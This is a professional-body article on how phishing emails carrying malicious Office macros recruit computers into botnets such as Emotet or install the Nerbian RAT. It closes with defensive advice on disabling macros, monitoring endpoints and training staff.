‘Updated expense policy – please read’, reads the subject line from HR, writes Timothy Clark MBCS, a Full-Stack Software Engineer. You open up the attached word document. The first page lets you know that you need to click on the button in the yellow banner to view the full document.
You click. One click.
One click and your computer has joined an army. A zombie army of computers that can be leveraged by any hacker with the money to pay for access. One day it’s distributing ransomware, another time it’s being used in a denial of service attack, and periodically it’s recruiting more machines with even more macros.
Macros are one of several reasons why the advice to ‘think before you click on attachments’ is so ubiquitous. Email has, and continues to be the most popular way to infiltrate an organisation, providing direct access to phish and distribute malware to employees. Research conducted by the Identity Theft Resource Centre shows that email phishing remains the number one cause of data breaches in the US.
We should establish what we mean by a ‘macro’. Macros in Microsoft Office work by chaining together larger blocks of functionality that have already been programmed into useful sequences that are used to automate repetitive or time-consuming tasks. However, this can be a bad thing, as malicious macros can be used to execute code on victim machines.
Despite this, Office macros continue to be a threat, even being employed by one of the most significant cybercrime operations of our time: Emotet. Emotet provides a ‘botnet as a service’, a coordinated collection of compromised computers that will do whatever the paying hacker wishes. Researchers found that in several cases, macro-laden Excel files were sent to the victims which, when ‘enable content’ is clicked, would compromise target machines and enslave them as puppets of the Emotet network.
Another such example of a modern threat using this archaic method of compromise is the Nerbian RAT (Remote Access Trojan), which even though its RAT is written in Golang, exploits macros to run malicious PowerShell scripts that download the RAT from a remote server. Once on your system, it is capable of logging keystrokes (thereby intercepting passwords and other sensitive information you might type) and even capturing your screen.
Be part of something bigger, join the Chartered Institute for IT.
Universities and schools are particularly vulnerable to this vector of attack, as they often run outdated software and don’t have the resources to train huge numbers of students and staff. Sometimes the macros sent will hijack the mailbox of the victim, thereby providing automated means for an attacker to distribute toxic emails institution-wide. Without a dedicated Information Security officer (which many education institutions either can’t or won’t pay for), they may be woefully unprepared for such an attack and the impact can cause tremendous damage.
This doesn’t mean that larger companies that employ CISOs are immune either. Any organisation with a few overly-trusting employees can be compromised. The power of a single click. In larger environments it is possible for sophisticated malware such as Emotet or Nerbian to remain unnoticed for a long time, and chances are that the employee who unwittingly ran the malicious macros may take some time to realise their machine has been compromised.
So, what can you do?
This issue has been plaguing organisations of all shapes and sizes for decades and still seems to be going strong. Luckily, there is good news on the horizon and various strategies you can implement to mitigate this attack vector.
Seems pretty obvious – why do we even need these things anyway? Well, if everyone in your company thinks that, disabling them domain-wide is probably a good idea. Sometimes they do serve a useful purpose however, so a discussion may be warranted with employees to inform them of appropriate use cases. Microsoft is making this the default behaviour of Office at the moment, which should allow many information security practitioners to sleep better at night.
Monitor your endpoints for compromise
Ensure you monitor all endpoints for malware and viruses, and for a larger estate you might consider tools that provide greater visibility in the event that machines are compromised. Such tools can even have the functionality to block email or network access to prevent the spread of these threats.
Don’t use email (if possible)
If your company uses tools such as Slack, Teams or Mattermost for communication, it might be a good idea to step that up. Try to reduce your dependence on email and this will make malicious messages much easier to spot. These tools can also receive dodgy documents and phishing messages, but if you restrict external communication to specific channels you reduce your exposure to such attacks.
Education, education, education
The most important piece of advice here which you can implement starting tomorrow is better training. Train employees to spot phishing emails and dodgy docs and they will be your eyes and ears for these attacks. Tell them to take this advice home with them – have they received suspicious personal email or text messages – how can they tell? Teach them the power of a single click. One click has the power to compromise several machines. One click has the power to cause major disruption to your organisation. One click may even close you down.
About the author
Timothy Clark is a Full-stack Software Engineer who also works as a Cybersecurity consultant, defending against the dark arts. Clark is currently chair of the BCS Preston & District branch and sits on the Early Career executive. He is also a journeyman in the Worshipful Company of Information Technologists’.